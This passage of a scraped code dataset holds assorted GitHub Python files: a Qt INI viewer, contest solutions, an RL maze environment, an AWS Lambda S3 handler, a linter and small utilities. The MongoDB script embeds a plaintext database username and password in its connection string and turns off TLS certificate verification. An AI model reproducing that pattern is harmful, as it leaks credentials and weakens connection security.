self.list.itemSelectionChanged.connect(self.updateSection)\n\n self.lay = qtw.QGridLayout()\n\n self.lay.addWidget(self.list, 0, 0)\n self.lay.addWidget(self.table, 0, 1)\n\n self.setLayout(self.lay)\n\n def updateSection(self):\n self.table.model.selected_section = self.list.currentItem().text()\n self.table.model.loadData()\n self.table.model.dataChanged.emit(qtc.QModelIndex, qtc.QModelIndex)\n\n\nif __name__ == '__main__':\n\n app = qtw.QApplication(sys.argv)\n current_file = qtw.QFileDialog.getOpenFileName()\n config = configparser.ConfigParser()\n config.read(current_file)\n window = IniView(config)\n window.show()\n app.exec_()\n","repo_name":"IjonTichiy/iniEditor","sub_path":"iniView.py","file_name":"iniView.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27566086529","text":"import fractions\nn, m = map(int, input().split())\na = [i//2 for i in list(map(int, input().split()))]\ntmp = a[0]\ncount = 0\nwhile tmp % 2 == 0:\n tmp /= 2\n count += 1\nfor i in range(n):\n tmp = a[i]\n div = 0\n while tmp % 2 == 0:\n tmp /= 2\n div += 1\n if div != count:\n print(0)\n exit()\nans = 0\nk = a[0]\nfor i in range(n):\n k = (k * a[i]) // (fractions.gcd(k, a[i]))\nans = m // k\nans = (ans + 1) // 2\nprint(ans)","repo_name":"Yuta123456/AtCoder","sub_path":"python/AtCoder Beginner Contest 150/Semi Common Multiple.py","file_name":"Semi Common Multiple.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24777861177","text":"class Solution:\n def merge(self, nums1, m, nums2, n) -> None:\n \"\"\"\n Do not return anything, modify nums1 in-place instead.\n \"\"\"\n\n leftIndex = m-1\n rightIndex = n-1\n curIndex = m+n - 1\n\n while curIndex > -1:\n\n if leftIndex < 0:\n\n nums1[curIndex] = nums2[rightIndex]\n rightIndex -= 1\n curIndex -= 1\n elif rightIndex < 0:\n nums1[curIndex] = nums1[leftIndex]\n leftIndex -= 1\n curIndex -= 1\n elif nums1[leftIndex] >= nums2[rightIndex]:\n nums1[curIndex] = nums1[leftIndex]\n leftIndex -= 1\n curIndex -= 1\n elif nums1[leftIndex] < nums2[rightIndex]:\n nums1[curIndex] = nums2[rightIndex]\n rightIndex -= 1\n curIndex -= 1\n","repo_name":"Moshi-Li/codePractice","sub_path":"leetcode/088.py","file_name":"088.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13979905199","text":"# coding=UTF-8\n\"\"\"\nReinforcement learning maze example.\nRed rectangle: explorer.\nBlack rectangles: hells [reward = -1].\nYellow bin circle: paradise [reward = +1].\nAll other states: ground [reward = 0].\nThis script is the environment part of this example.\nThe RL is in RL_brain.py.\nView more on my tutorial page: https://morvanzhou.github.io/tutorials/\n\"\"\"\n\n\"\"\"定义三个参数的取值\"\"\"\nimport numpy as np\nimport time\nimport sys\n\nUNIT = 40 # pixels 像素\nMAZE_H = 84 # grid height 网格高度\nMAZE_W = 84 # grid width 网格宽度\n# class Maze(tk.Tk, object):\nclass Maze(object): #继承父类object\n def __init__(self):\n super(Maze, self).__init__() #对继承自父类的属性进行初始化\n para1 = list(range(100, 140)) #1.1-1.4\n para2 = [2, 3, 4, 5, 6, 7, 8] #2-8\n para3 = list(range(60, 90)) # 0.6-0.9\n self.parameter_space = []\n for i in range(len(para1)):\n for j in range(len(para2)):\n for k in range(len(para3)):\n self.parameter_space.append((para1[i]/100.0, para2[j], para3[k]/100.0))\n #append() 方法用于在列表末尾添加新的对象。\n #print(self.parameter_space)\n ###self.action_space = ['u', 'd', 'l', 'r']\n self.action_space = [] #三个参数的取值空间\n for i in range(len(para1)*len(para2)*len(para3)):\n self.action_space.append(i) #[0-10500]\n self.n_actions = len(self.action_space)\n self.height = MAZE_H\n self.width = MAZE_H\n self.n_features = self.height * self.width #特征网格的大小\n # self.title('maze')\n # self.geometry('{0}x{1}'.format(MAZE_H * UNIT, MAZE_H * UNIT))\n # self._build_maze()\n\n def _build_maze(self):\n self.canvas = tk.Canvas(self, bg='white', \n height=MAZE_H * UNIT,\n width=MAZE_W * UNIT)\n\n # create grids\n for c in range(0, MAZE_W * UNIT, UNIT):\n x0, y0, x1, y1 = c, 0, c, MAZE_H * UNIT\n self.canvas.create_line(x0, y0, x1, y1)\n for r in range(0, MAZE_H * UNIT, UNIT):\n x0, y0, x1, y1 = 0, r, MAZE_W * UNIT, r\n self.canvas.create_line(x0, y0, x1, y1)\n\n # create origin\n origin = np.array([20, 20])\n\n # hell\n hell1_center = origin + np.array([UNIT * 2, UNIT])\n self.hell1 = self.canvas.create_rectangle(\n hell1_center[0] - 15, hell1_center[1] - 15,\n hell1_center[0] + 15, hell1_center[1] + 15,\n fill='black') #绘制黑色矩形框\n\n # create oval\n oval_center = origin + UNIT * 2\n self.oval = self.canvas.create_oval(\n oval_center[0] - 15, oval_center[1] - 15,\n oval_center[0] + 15, oval_center[1] + 15,\n fill='yellow')\n\n # create red rect\n self.rect = self.canvas.create_rectangle(\n origin[0] - 15, origin[1] - 15,\n origin[0] + 15, origin[1] + 15,\n fill='red') #绘制红色圆形\n\n # pack all\n self.canvas.pack()\n #重置环境状态,回到初始环境,方便下一次观测\n def reset(self):\n observation = np.zeros(self.n_features) #创建一个一维数组,大小为n_features\n return observation\n #推进时间步长,返回下一状态和奖励\n def step(self, action):\n\n s_ = np.zeros(self.n_features)\n parameter = self.parameter_space[action]\n print(parameter)\n reward = parameter[0] + parameter[1] + parameter[2]\n done = True\n return s_, reward, done\n\n def render(self):\n # time.sleep(0.01)\n self.update()\n\n\n","repo_name":"GaoVinfly/ORBSLAM3-AND-DDPG","sub_path":"maze_env.py","file_name":"maze_env.py","file_ext":"py","file_size_in_byte":3775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39622289842","text":"# Sends binary data from AWS S3 to API Gateway via AWS Lambda function through lambda proxy integration\n\nimport json\nimport base64\nimport boto3\n\ndef lambda_handler(event, context):\n \n s3 = boto3.client(\"s3\") \n \n # for lambda proxy integration \n bucket_name = event['pathParameters']['bucket']\n file_name = event['queryStringParameters']['file']\n \n file_object = s3.get_object(Bucket=bucket_name, Key=file_name)\n file_content = file_object[\"Body\"].read()\n \n print(bucket_name, file_name)\n\n return {\n \"statusCode\": 200,\n \"headers\": {\n \"Content-Type\": \"application/pdf\"\n },\n \"body\" : base64.b64encode(file_content),\n \"isBase64Encoded\": True\n }\n \n # In case one wants to send json as response\n \n # return {\n # \"statusCode\": 200,\n # \"headers\": {\n # \"Content-Type\": \"application/json\"\n # },\n # \"body\" : json.dumps(\"Json response\"),\n # \"isBase64Encoded\": False\n # }","repo_name":"Sayan3sarkar/AWS_APIGateway_Lambda_functions","sub_path":"lambda_proxy_binary_data_from_lambda_to_APIGateway.py","file_name":"lambda_proxy_binary_data_from_lambda_to_APIGateway.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12502780547","text":"import sys\nfrom PySide2.QtWidgets import QApplication, QWidget,QSlider\nfrom PySide2.QtGui import QPainter, QPaintEvent\nfrom PySide2 import QtCore,QtWidgets\n\nclass MonPainter(QWidget):\n def __init__(self, parent=None):\n super(MonPainter, self).__init__(parent)\n self.valeur= 0\n\n\n def paintEvent(self, event:QPaintEvent):\n p = QPainter(self)\n p.setBrush(QtCore.Qt.blue)\n\n taille = min(self.width(),self.height())\n\n p.drawRect(10,10,taille-20, taille-20)\n p.setBrush(QtCore.Qt.yellow)\n p.drawEllipse(20,20,taille-40, taille-40)\n\n\n p.translate(taille/2,taille/2)\n p.rotate(135 + self.valeur*2.7)\n\n p.drawLine(0,0,0,taille/3)\n\n\n\n def setValeur(self,val):\n self.valeur = val\n self.update()\n\nclass MaFenetrePrincipale(QWidget):\n\n def __init__(self,parent = None):\n super(MaFenetrePrincipale,self).__init__(parent)\n\n self.compteur = MonPainter()\n self.slider = QSlider(QtCore.Qt.Horizontal)\n self.layout = QtWidgets.QVBoxLayout()\n self.layout.addWidget(self.compteur)\n self.layout.addWidget(self.slider)\n self.setLayout(self.layout)\n self.slider.valueChanged.connect(self.compteur.setValeur)\n\n\n\n\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n maFen = MaFenetrePrincipale()\n maFen.show()\n sys.exit(app.exec_())","repo_name":"nick-andri/painter","sub_path":"monPainter.py","file_name":"monPainter.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37795648204","text":"import utils\nimport csv\n\ndef stripped_file(file_name):\n '''\n +--------+\n | Output |\n +--------+\n A dictionary containing all the lines in the source code with a line\n number starting from line 1.\n { line_number: source line}\n\n +-----------+\n | Parameter |\n +-----------+\n A string of the input Python source code file name\n\n +----------+\n | Function |\n +----------+\n Strips the '\\n' and '\\r' characters of the file as they are not\n included in the consideration of the length of a line.\n\n '''\n file = open(file_name)\n all_lines = {}\n # Counts the line number from 1\n line_counter = 1\n for line in file:\n stripped_line = line.rstrip('\\n\\r')\n all_lines[line_counter] = stripped_line\n # As the newline characters and return characters are\n # stripped off the line, the line number is incremented by 1\n line_counter += 1\n file.close()\n return all_lines\n\ndef single_char_var(file_name):\n '''\n +--------+\n | Output |\n +--------+\n A list of tuples containing the error type, line number, column number\n of the first and only character of the variable name, variable name,\n and line in the source code\n\n +-----------+\n | Parameter |\n +-----------+\n A string of the input Python source code file name\n\n +----------+\n | Function |\n +----------+\n Reports the variable names consisting of a single character.\n All repeated single character variables on the same line are also\n reported.\n\n '''\n result = []\n # Calls the vars_indents function in the utils module\n # to retrieve the dictionary containing variables\n variables_dict = utils.vars_indents(file_name)[0]\n all_lines = stripped_file(file_name)\n error_type = 'SINGLE_CHAR_VAR'\n for line_number in variables_dict:\n list = variables_dict[line_number]\n line = all_lines[line_number]\n for tuple in list:\n variable, col_number = tuple\n # If the variable is a single character, a tuple is created\n # and appended to a list\n if len(variable) == 1:\n detail = (error_type, line_number, col_number, variable, line)\n result.append(detail)\n return result\n\ndef long_line(file_name):\n '''\n +--------+\n | Output |\n +--------+\n A list of tuples containing the error type, line number, None type, length\n of line, and line in the source code\n # Note: None type is used in the column of the <prefix>.lint.csv file as\n there is no column number for a long line.\n\n +-----------+\n | Parameter |\n +-----------+\n A string of the input Python source code file name\n\n +----------+\n | Function |\n +----------+\n Reports the lines that contains more than 79 characters.\n\n '''\n all_lines = stripped_file(file_name)\n result = []\n error_type = 'LONG_LINE'\n for line_number in all_lines:\n line = all_lines[line_number]\n line_length = len(line)\n # If the length of the line exceeds 79 characters, a tuple\n # is created and appended to a list\n if line_length > 79:\n detail = (error_type, line_number, None, line_length, line)\n result.append(detail)\n return result\n\ndef get_first_whitespace(line):\n '''\n +--------+\n | Output |\n +--------+\n An integer of the first column number of the trailing whitespace character\n in the corresponding line\n\n +-----------+\n | Parameter |\n +-----------+\n A string of a line of source code\n\n +----------+\n | Function |\n +----------+\n Gets the column of the first column number by testing if the character\n is a space (' ') or a tab ('\\t') character.\n\n '''\n number_cols = len(line)\n count = 0\n for char in line[::-1]:\n if char in ' \\t':\n count += 1\n else:\n break\n col_number = number_cols - count + 1\n return col_number\n\ndef trail_whitespace(file_name):\n '''\n +--------+\n | Output |\n +--------+\n A list of tuples containing the error type, line number, column position\n of first trailing whitespace, None type, and line in the source code\n # Note: None type is used in the INFO column of the <prefix>.lint.csv\n file as it is an empty field\n\n +-----------+\n | Parameter |\n +-----------+\n A string of the input Python source code file name\n\n +----------+\n | Function |\n +----------+\n Reports the lines that contains space or tab characters immediately before\n the end of a line\n \n '''\n all_lines = stripped_file(file_name)\n result = []\n error_type = 'TRAIL_WHITESPACE'\n for line_number in all_lines:\n line = all_lines[line_number]\n # If the end of the line contains spaces or tab characters,\n # a tuple is created and appended to a list\n if line.endswith(' ') or line.endswith('\\t'):\n col_number = get_first_whitespace(line)\n detail = (error_type, line_number, col_number, None, line)\n result.append(detail)\n return result\n\ndef bad_indent(file_name):\n '''\n +--------+\n | Output |\n +--------+\n A list of tuples containing the error type, line number, column position\n of first character immediately after indentation, None type, and line in\n the source code\n # Note: None type is used in the INFO column of the <prefix>.lint.csv\n file as it is an empty field\n \n +-----------+\n | Parameter |\n +-----------+\n A string of the input Python source code file name\n\n +----------+\n | Function |\n +----------+\n Reports the lines that has an indentation that is not a multiple of 4\n single spaces, inclusive of tab characters\n\n '''\n # Calls the vars_indents function in the utils module\n # to retrieve the dictionary containing indentations\n indents_dic = utils.vars_indents(file_name)[1]\n all_lines = stripped_file(file_name)\n result = []\n error_type = 'BAD_INDENT'\n for line_number in indents_dic:\n indents, end_col = indents_dic[line_number]\n line = all_lines[line_number]\n # Number of single spaces is before the column position\n col_indents = end_col - 1\n # If the number of spaces is not a multiple of 4,\n # a tuple is created and appended to a list\n if col_indents % 4 != 0:\n detail = (error_type, line_number, end_col, None, line)\n result.append(detail)\n return result\n\ndef all_errors(file_name):\n '''\n +--------+\n | Output |\n +--------+\n A list of tuples containing the error type, line number, column number,\n info, and line in the source code\n\n +-----------+\n | Parameter |\n +-----------+\n A string of the input Python source code file name\n\n +----------+\n | Function |\n +----------+\n Gets all the errors in the file and arrange them in ascending line number\n\n '''\n single_char_errors = single_char_var(file_name)\n long_line_errors = long_line(file_name)\n trail_whitespace_errors = trail_whitespace(file_name)\n bad_indent_errors = bad_indent(file_name)\n result = []\n for tuple in single_char_errors:\n result.append(tuple)\n for tuple in long_line_errors:\n result.append(tuple)\n for tuple in trail_whitespace_errors:\n result.append(tuple)\n for tuple in bad_indent_errors:\n result.append(tuple)\n # All the errors are sorted by the line number\n result.sort(key = lambda detail: detail[1])\n return result\n\ndef error_file(file_name):\n '''\n +--------+\n | Output |\n +--------+\n None\n\n +-----------+\n | Parameter |\n +-----------+\n A string of the input Python source code file name\n\n +----------+\n | Function |\n +----------+\n Creates a CSV file containing the summary of all the style errors made in\n the input file\n\n '''\n prefix = file_name[:-3]\n out_name = prefix + '.lint.csv'\n csv_file = open (out_name, \"w\")\n allerrors = all_errors(file_name)\n header = [('ERROR_TYPE', 'LINE_NUMBER', 'COLUMN', 'INFO', 'SOURCE_LINE')]\n writer = csv.writer(csv_file)\n writer.writerows(header)\n # A container is used to make a sequence for writing a row in the CSV file\n for tuple in allerrors:\n container = []\n container.append(tuple)\n writer.writerows(container)\n csv_file.close()\n\ndef count_score(file_name):\n '''\n +--------+\n | Output |\n +--------+\n A floating point rounded to 2 decimal places\n\n +-----------+\n | Parameter |\n +-----------+\n A string of the input Python source code file name\n\n +----------+\n | Function |\n +----------+\n Calculates the quality score of the style errors made in the input style\n over a score of 10\n '''\n # Gets all the errors made from all_errors function\n allerrors = all_errors(file_name)\n totalpenalty = 0.0\n for tuple in allerrors:\n error_type = tuple[0]\n if error_type == 'TRAIL_WHITESPACE':\n totalpenalty += 1.0\n elif error_type == 'SINGLE_CHAR_VAR':\n totalpenalty += 2.0\n elif error_type == 'BAD_INDENT':\n totalpenalty += 4.0\n elif error_type == 'LONG_LINE':\n totalpenalty += 5.0\n # Number of lines is the number of keys in stripped_file function\n numlines = len(stripped_file(file_name))\n # If the file is empty, a penalty score of 10 is given\n if numlines == 0:\n penalty = 10.0\n else:\n penalty = ((totalpenalty / numlines) * 10)\n qualityscore = max(0, 10 - penalty)\n return round(qualityscore, 2)\n\ndef score_file(file_name):\n '''\n +--------+\n | Output |\n +--------+\n A CSV file containing the timestamp of when the lint file is run,\n and the quality score of the input file\n\n +-----------+\n | Parameter |\n +-----------+\n A string of the prefix of the input Python source code file name\n\n +----------+\n | Function |\n +----------+\n Creates a CSV file that contains the history of the quality score\n of the input Python file\n\n '''\n prefix = file_name[:-3]\n score_file = open(prefix + '.score.csv', 'a')\n writer = csv.writer(score_file)\n row = []\n container = []\n timestamp = utils.get_current_date_time()\n qualityscore = count_score(file_name)\n row.append(timestamp)\n row.append(qualityscore)\n container.append(row)\n writer.writerows(container)\n score_file.close()\n\ndef lint(file_name):\n '''\n +--------+\n | Output |\n +--------+\n None\n\n +-----------+\n | Parameter |\n +-----------+\n A string of the prefix of the input Python source code file name\n\n +----------+\n | Function |\n +----------+\n Checks the styling errors in the input file and creates an error file\n and modifies a quality score log file\n\n '''\n error = error_file(file_name)\n score = score_file(file_name)\n return None\n","repo_name":"kicholiz/LintForPython","sub_path":"lint.py","file_name":"lint.py","file_ext":"py","file_size_in_byte":10943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30674273924","text":"import pymongo\nfrom wiki_info import get_info\nimport ssl\nfrom Image_Parsing.image_parse import parse_ingredients_path\n\nmyclient = pymongo.MongoClient(\"mongodb+srv://ryan:password22@cluster0-cxijt.gcp.mongodb.net/test?retryWrites=true&ssl=true&ssl_cert_reqs=CERT_NONE\")\n\n# food = {\n# \"name\" : string,\n# \"ingredients\" : [list by ID]\n# }\n\n# ingredient = {\n# \"title\",\n# \"summary\",\n# \"health\"\n# }\n\ndef api_wrapper(name, path):\n lst = parse_ingredients_path(path)\n create_entry(name, lst)\n\n\ndef create_entry(name, ingredients):\n db = myclient.ingredientInfo\n food_ingredients = db.ingredients\n foods = db.foods\n\n if foods.find_one({'name' : name}) != None:\n return\n\n food_post = {\n \"name\" : name,\n \"ingredients\" : []\n }\n\n for i in ingredients:\n id = food_ingredients.find_one({'name': i})\n\n if id == None: # if ingredient not in database\n d = get_info(i)\n if d != None:\n post_data = {\n \"name\" : i,\n \"info\" : d\n }\n result = food_ingredients.insert_one(post_data)\n\n food_post[\"ingredients\"].append(i)\n result = foods.insert_one(food_post)\n\n\n\ndef postTest(term):\n\n db = myclient.ingredientInfo\n posts = db.posts\n\n post_data = {\n \"title\" : term,\n }\n #\n\n result = posts.insert_one(post_data)\n\n\n# db = myclient.test2\n# posts = db.ingredients\n#\n# post_data = {\n# \"title\" : \"water\",\n# \"info\" : get_info(\"water\")\n# }\n# result = posts.insert_one(post_data)\n\n# postTest(\"glucose\")\n#\n# db = myclient.ingredient_info\n# posts = db.posts\n#\n# x = posts.find_one({'title': 'apple'})\n# if x == None:\n# print(\"none\")\n# else:\n# print(x[\"_id\"])\n# x = mycol.insert_one(post_data)\n#print(x)\n#print(myclient.list_database_names())\n","repo_name":"rafael123rr/Minervahackathon","sub_path":"Backend/mongodb.py","file_name":"mongodb.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3001130183","text":"#!/usr/bin/python3\r\n# coding=UTF-8\r\nimport platform\r\nimport sys, os\r\n\r\n\r\ndef Exit(score, Answered_questions, correct_questions, unlocked_tools):\r\n print(\"您总共获得了\", score, \"分积分\")\r\n print(\"总共解锁了\", unlocked_tools, '个工具')\r\n print(\"您总共参与了\", Answered_questions, \"次答题\")\r\n print(\"共有\", correct_questions, \"次答题是正确的\")\r\n print(\"==========================GOODBYE============================\")\r\n sys.exit()\r\n\r\n\r\ndef SaveRecord(score, Answered_questions, correct_questions, unlocked_tools):\r\n try:\r\n fw1 = \"您总共获得了\" + str(score) + \"分积分\\n\" # 第一行文字\r\n fw2 = \"总共解锁了\" + str(unlocked_tools) + '个工具\\n' # 第二行文字\r\n fw3 = \"您总共参与了\" + str(Answered_questions) + \"次答题\\n\" # 第三行\r\n fw4 = \"共有\" + str(correct_questions) + \"次答题是正确的\\n\" # 第四行\r\n file = open(file=\"Record.eshf\", mode=\"a\")\r\n file.write(fw1)\r\n file.write(fw2)\r\n file.write(fw3)\r\n file.write(fw4)\r\n file.write(\"==============================================\")\r\n except Exception as error:\r\n print(\"出现错误:%s\" % error)\r\n print(\"保存失败!\")\r\n else:\r\n print(\"保存成功,文件为本目录下的Record.eshf\")\r\n finally:\r\n pass\r\n\r\n\r\ndef calc():\r\n print(\"输入START开始计算,输入HELP进入帮助模式,输入CHECK_VERSION查看版本,输入QUIT退出\")\r\n command = input(\"请输入指令:\")\r\n if command == \"START\":\r\n del command\r\n while 1:\r\n \"\"\"shuzi1 = int(input(\"PLEASE TYPE IN THE FIRST NUMBER IN YOUR FORMULA>\"))\r\n _operator_ = input(\"PLEASE TYPE IN THE OPERATOR>\")\r\n shuzi2 = int(input(\"PLEASE TYPE IN THE FIRST NUMBER IN YOUR FORMULA>\"))\r\n if _operator_ == \"+\":\r\n print(\"ANSWER = \", shuzi1 + shuzi2)\r\n elif _operator_ == \"-\":\r\n print(\"ANSWER = \", shuzi1 - shuzi2)\r\n elif _operator_ == \"*\":\r\n print(\"ANSWER = \", shuzi1 * shuzi2)\r\n elif _operator_ == \"**\":\r\n print(\"ANSWER =\", shuzi1 ** shuzi2)\r\n elif _operator_ == \"/\":\r\n if shuzi2 == 0:\r\n print(\"ERROR! 0x00000002 ZeroDivision\")\r\n else:\r\n print(\"ANSWER = \", shuzi1 / shuzi2)\r\n elif _operator_ == \"//\":\r\n if not shuzi2 == \"0\":\r\n print(\"ANSWER = \", shuzi1 // shuzi2)\r\n else:\r\n print(\"ERROR! 0x00000002 ZeroDivision\")\r\n else:\r\n print(\"ERROR! 0x00000001 ValueError\")\"\"\"\r\n try:\r\n shuzi1 = float(input(\"请输入算式中的第一个数:\"))\r\n _operator_ = input(\"请输入运算符:\")\r\n shuzi2 = float(input(\"请输入算式中的第二个数:\"))\r\n except ValueError as error:\r\n print(\"本计算器仅支持确切的一个数进行计算,不支持带有字母等字符的数进行计算哦!\")\r\n else:\r\n if _operator_ == \"+\":\r\n print(\"答案是\", shuzi1 + shuzi2)\r\n elif _operator_ == \"-\":\r\n print(\"答案是\", shuzi1 - shuzi2)\r\n elif _operator_ == \"*\":\r\n print(\"答案是\", shuzi1 * shuzi2)\r\n elif _operator_ == \"**\":\r\n print(\"答案是\", shuzi1 ** shuzi2)\r\n elif _operator_ == \"/\":\r\n if shuzi2 == 0:\r\n print(\"ERROR! 0x00000002 ZeroDivision\")\r\n else:\r\n print(\"答案是\", shuzi1 / shuzi2)\r\n elif _operator_ == \"//\":\r\n if not shuzi2 == \"0\":\r\n print(\"答案是\", shuzi1 // shuzi2)\r\n else:\r\n print(\"ERROR! 0x00000002 ZeroDivision\")\r\n elif _operator_ == \"exit\" or _operator_ == \"EXIT\" or _operator_ == \"Exit\":\r\n print(\"ヾ( ̄▽ ̄)Bye~Bye~\")\r\n break\r\n else:\r\n print(\"ERROR! 0x00000001 OperatorError\")\r\n finally:\r\n pass\r\n\r\n elif command == \"HELP\":\r\n del command\r\n print(\"*************************简易计算器帮助文件*************************\")\r\n print(\"1.运算符\")\r\n print(\"加法 +\")\r\n print(\"减法 -\")\r\n print(\"乘法 *\")\r\n print(\"除法 /\")\r\n print(\"整除 //\")\r\n print(\"幂运算(次方运算) **\")\r\n print(\"2.退出计算模式\")\r\n print(\"注意!这会直接退出简易计算器程序,不会回到菜单栏!!!\")\r\n print(\"方法:在询问运算符时输入exit即可(全大写或首字母大写都能实现退出计算模式)\")\r\n elif command == \"CHECK_VERSION\":\r\n del command\r\n print(\"版本:1.0.0.810.1405 beta version 3\")\r\n elif command == \"QUIT\":\r\n del command\r\n print(\"再见\")\r\n else:\r\n print(\"ERROR! 0x00000001 CommandError\")\r\n","repo_name":"YSLF2022/EasyStudyHelper","sub_path":"Resourse.py","file_name":"Resourse.py","file_ext":"py","file_size_in_byte":5194,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"36537484005","text":"import unittest\n\nimport numpy as np\nfrom sentence_transformers import SentenceTransformer\nfrom src.find_papers_by_keyword.embeddings_generator import EmbeddingsGenerator\nfrom src.file_readers.paper_file_reader import PaperFileReader\n\nclass TestPaperEmbeddings(unittest.TestCase):\n @classmethod\n def setUpClass(cls) -> None:\n cls.embeddings_generator = EmbeddingsGenerator()\n\n paper_file = \"test_data/papers.json\"\n file_reader = PaperFileReader('id', 'title', 'abstract', None)\n papers = file_reader.read_file(paper_file)\n cls.embeddings, cls.id_to_ind = cls.embeddings_generator.generate_paper_embeddings(papers)\n\n def testEmbeddingsShape(self):\n self.assertEqual(self.embeddings.shape, (10, 768))\n\n def testEmbeddingValues(self):\n first_paper_raw = \"Sparsity-certifying Graph Decompositions. We describe a new algorithm, the $(k,\\\\ell)$-pebble game with colors, and use\\nit obtain a characterization of the family of $(k,\\\\ell)$-sparse graphs and\\nalgorithmic solutions to a family of problems concerning tree decompositions of\\ngraphs. Special instances of sparse graphs appear in rigidity theory and have\\nreceived increased attention in recent years. In particular, our colored\\npebbles generalize and strengthen the previous results of Lee and Streinu and\\ngive a new proof of the Tutte-Nash-Williams characterization of arboricity. We\\nalso present a new decomposition that certifies sparsity based on the\\n$(k,\\\\ell)$-pebble game with colors. Our work also exposes connections between\\npebble game algorithms and previous sparse graph algorithms by Gabow, Gabow and\\nWestermann and Hendrickson.\\n\"\n model = SentenceTransformer('bert-base-nli-mean-tokens')\n first_embedding = model.encode(first_paper_raw)\n\n np.testing.assert_almost_equal(self.embeddings[0], first_embedding)","repo_name":"Forward-UIUC-2021F/kshitij-sinha-find-papers-by-keyword","sub_path":"test/find_papers_by_keyword/test_embeddings_generator.py","file_name":"test_embeddings_generator.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"40937132252","text":"import os\nimport random\nimport numpy as np\n\ndis_list = [0.00005, 0.000025, 0.00001, 0.000005]\ngan_list = [0.00005, 0.000025, 0.00001, 0.000005, 0.0000025]\nupdate_it_list = [1, 2, 5] # [1, 2, 5, 10]\ngamma_list = [0]\noptimizer_list = ['Nadam']\nloss_list = ['mean_squared_error']\nbeta_list = [0.0]#, 0.5, 0.9]\n\ndef run_loop():\n gpu = 0 \n cmd_list = []\n for dis in dis_list:\n gan_small_list = np.array(gan_list)[np.array(gan_list) <= dis][0:2]\n for gan in gan_small_list:\n for update_it in update_it_list:\n for optimizer in optimizer_list:\n for loss in loss_list:\n gpu = ((gpu + 1) % 4)\n cmd = \"python3 BrainWeb.py --remote False --paired False --n_epochs 201 --batch_size 10 --show_every 10 --beta 0.0\" \\\n + \" --lr_dis \" + str(dis) \\\n + \" --lr_gan \" + str(gan) \\\n + \" --update_it \" + str(update_it) \\\n + \" --optimizer \" + str(optimizer) \\\n + \" --loss \" + str(loss) \\\n + \" --gpu \" + str(gpu)\n cmd_list.append(cmd)\n\n np.random.shuffle(cmd_list)\n print(len(cmd_list))\n for i in range(4):\n cmd_i = [\"#!/bin/bash\\n\"]\n for idx in range(len(cmd_list)):\n if cmd_list[idx][-1] == str(i):\n cmd_i.append(cmd_list[idx])\n with open(\"p\" + str(i) + \".sh\", 'w') as f:\n for s in cmd_i:\n f.write(str(s) + '\\n')\n print(len(cmd_i) - 1)\n\ndef main():\n run_loop()\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"attilasimko/drs","sub_path":"MT/loop_gauss.py","file_name":"loop_gauss.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4411384292","text":"import numpy as np\n\nfrom tsipy.fusion import Windows\n\n\ndef check_window_ranges(\n windows: Windows,\n x_pred_starts: np.ndarray,\n x_pred_ends: np.ndarray,\n x_fit_starts: np.ndarray,\n x_fit_ends: np.ndarray,\n) -> None:\n \"\"\"Checks if input windows have approximately equal window bounds.\n\n Checks prediction and training bounds.\n \"\"\"\n for i, window in enumerate(windows):\n if np.abs(x_pred_starts[i]) == np.infty:\n assert x_pred_starts[i] == window.x_pred_start\n else:\n assert np.abs(x_pred_starts[i] - window.x_pred_start) < 1e-3\n\n if np.abs(x_pred_ends[i]) == np.infty:\n assert x_pred_ends[i] == window.x_pred_end\n else:\n assert np.abs(x_pred_ends[i] - window.x_pred_end) < 1e-3\n\n assert np.abs(x_fit_starts[i] - window.x_fit_start) < 1e-3, \"{} != {}\".format(\n x_fit_starts[i], window.x_fit_start\n )\n assert np.abs(x_fit_ends[i] - window.x_fit_end) < 1e-3, \"{} != {}\".format(\n x_fit_ends[i], window.x_fit_end\n )\n\n\ndef check_array_equal(a: np.ndarray, b: np.ndarray) -> None:\n \"\"\"Checks if both arrays are equal.\"\"\"\n assert np.array_equal(a, b), \"Array a not equal to array b.\"\n\n\ndef check_array_approximate(\n a: np.ndarray,\n b: np.ndarray,\n tolerance: float = 1e-3,\n) -> None:\n \"\"\"Checks if both arrays are approximately equal.\"\"\"\n check_array_shape(a, b)\n\n norm_a = np.linalg.norm(a)\n error = np.linalg.norm(a - b) / norm_a\n assert (\n error < tolerance\n ), \"Array a not equal to array b. ({:.6f} < {}, error < tolerance)\".format(\n error, tolerance\n )\n\n\ndef check_array_shape(a: np.ndarray, b: np.ndarray) -> None:\n \"\"\"Checks if both arrays have identical shapes.\"\"\"\n assert np.array_equal(\n a.shape, b.shape\n ), \"Array a {} and b {} shape mismatched.\".format(a.shape, b.shape)\n\n\ndef check_array_1d(a: np.ndarray) -> None:\n \"\"\"Checks if array is one dimensional.\"\"\"\n assert len(a.shape) == 1, \"Array a with shape {} is not 1D.\".format(a.shape)\n assert a.ndim == 1, \"Array a with shape {} is not 1D.\".format(a.shape)\n\n\ndef check_array_2d(a: np.ndarray) -> None:\n \"\"\"Checks if array is one dimensional.\"\"\"\n assert len(a.shape) == 2, \"Array a with shape {} is not 2D.\".format(a.shape)\n assert a.ndim == 2, \"Array a with shape {} is not 